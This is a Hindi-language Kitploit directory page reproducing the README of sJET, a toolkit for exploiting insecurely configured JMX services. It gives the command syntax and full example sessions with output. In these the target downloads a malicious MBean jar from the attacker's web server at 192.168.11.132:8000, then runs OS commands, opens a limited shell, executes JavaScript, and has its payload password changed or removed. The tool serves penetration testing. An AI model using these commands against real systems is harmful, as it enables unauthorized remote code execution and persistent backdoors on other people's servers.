Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sjet — siberas JMX शोषण टूलकिट | Kitploit
उपकरण/GitHubGitHub/siberas/sjet
पेलोड जनरेशनशोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubsiberas/sjet

sjet

siberas JMX शोषण टूलकिट

रिपॉजिटरी देखें
13391155 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

siberas द्वारा sJET

siberas JMX एक्सप्लॉयटेशन टूलकिट

sJET असुरक्षित रूप से कॉन्फ़िगर की गई JMX सेवाओं का आसान शोषण करने की अनुमति देता है। अतिरिक्त पृष्ठभूमि जानकारी यहाँ और यहाँ पाई जा सकती है।

आवश्यक शर्तें

  • Jython 2.7

उपयोग

SJET एक CLI इंटरफ़ेस लागू करता है (argparse का उपयोग करके):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

जहाँ

  • targetHost - लक्ष्य IP पता
  • targerPort - वह पोर्ट जहाँ JMX चल रहा है
  • password - वह पासवर्ड जो स्थापना के दौरान सेट किया गया था/है
  • MODE - स्क्रिप्ट मोड
  • modeOptions - चुने गए मोड के विकल्प

मोड और modeOptions

  • install - वर्तमान लक्ष्य में पेलोड स्थापित करता है
    • payload_url - पेलोड लोड करने का पूरा URL
  • payload_port - पेलोड लोड करने का पोर्ट
  • uninstall - वर्तमान लक्ष्य से पेलोड अनइंस्टॉल करता है
  • password - पहले से तैनात पेलोड पर पासवर्ड बदलता है
    • password - नया पासवर्ड
  • command - targetHost में कमांड CMD चलाता है
    • CMD - चलाने के लिए कमांड
  • shell - targetHost में एक सरल शेल शुरू करता है (java के Runtime.exec() की सीमाओं के साथ)
  • javascript - targetHost में एक जावास्क्रिप्ट फ़ाइल FILENAME चलाता है
    • FILENAME - चलाई जाने वाली जावास्क्रिप्ट
  • उदाहरण

    एक असुरक्षित JMX सेवा पर पेलोड MBean स्थापित करना

    निम्नलिखित उदाहरण में, असुरक्षित JMX सेवा 192.168.11.136:9991 पर चलती है, हमलावर का IP पता 192.168.11.132 है। JMX सेवा पेलोड jar फ़ाइल डाउनलोड करने के लिए हमलावर की वेब सेवा से कनेक्ट होगी। sJET पोर्ट 8000 पर आवश्यक वेब सेवा शुरू करेगा।

    MBean की सफल स्थापना के बाद, डिफ़ॉल्ट पासवर्ड को कमांड लाइन पर प्रदान किए गए पासवर्ड ("super_secret") में बदल दिया जाता है।

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Starting webserver at port 8000
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  1
    [+] Loaded javax.management.loading.MLet
    [+] Loading malicious MBean from http://192.168.11.132:8000
    [+] Invoking: javax.management.loading.MLet.getMBeansFromURL
    192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
    192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
    [+] Successfully loaded MBeanSiberas:name=payload,id=1
    [+] Changing default password...
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Successfully changed password
    
    h0ng10@rocksteady:~/sjet$
    

    Linux लक्ष्य में कमांड 'ls -la' चलाना:

    पेलोड स्थापित होने के बाद, हम इसका उपयोग लक्ष्य पर OS कमांड निष्पादित करने के लिए कर सकते हैं।

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  2
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Executing command: ls -la
    total 16
    drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
    drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
    lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
    drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
    lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
    drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
    lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8
    
    
    [+] Done
    h0ng10@rocksteady:~/sjet$
    

    लक्ष्य पर शेल मोड में ping चलाना

    यदि आप प्रत्येक कमांड के लिए Java लोड नहीं करना चाहते हैं, तो आप एक सीमित कमांड शेल प्राप्त करने के लिए "shell mode" का उपयोग कर सकते हैं।

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  3
    [+] Use command 'exit_shell' to exit the shell
    >>> ping -c 3 127.0.0.1
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Executing command: ping -c 3 127.0.0.1
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
    64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
    64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms
    
    --- 127.0.0.1 ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 2050ms
    rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms
    
    
    >>> exit_shell
    [+] Done
    h0ng10@rocksteady:~/sjet$
    

    लक्ष्य पर एक JavaScript पेलोड लागू करना:

    उदाहरण स्क्रिप्ट "javaproperties.js" असुरक्षित सेवा के Java गुणों को प्रदर्शित करती है। इसे निम्नानुसार लागू किया जा सकता है:

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  4
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Executing script
    java.vendor=Oracle Corporation
    sun.java.launcher=SUN_STANDARD
    catalina.base=/var/lib/tomcat8
    sun.management.compiler=HotSpot 64-Bit Tiered Compilers
    catalina.useNaming=true
    os.name=Linux
    ...
    java.vm.name=OpenJDK 64-Bit Server VM
    file.encoding=UTF-8
    java.specification.version=1.8
    
    
    h0ng10@rocksteady:~/sjet$
    

    पासवर्ड बदलें

    मौजूदा पासवर्ड ("super_secret") को "this-is-the-new-password" में बदलें:

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  6
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Successfully changed password
    
    [+] Done
    h0ng10@rocksteady:~/sjet$
    

    लक्ष्य से पेलोड MBean अनइंस्टॉल करें

    लक्ष्य से पेलोड 'Siberas' अनइंस्टॉल करें:

    root@kitploit:~
    minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
    [+] Connected: rmi://192.168.1.1  16
    [+] MBean correctly uninstalled
    minmaxer@prellermbp:~/sjet$
    

    योगदान

    बेझिझक योगदान दें।

    लेखक

    • Hans-Martin Münch - प्रारंभिक विचार और कार्य - h0ng10
    • Patricio Reller - CLI और अतिरिक्त विकल्प - preller

    इस परियोजना में भाग लेने वाले योगदानकर्ताओं की सूची भी देखें।

    लाइसेंस

    यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

    टूल डाउनलोड करें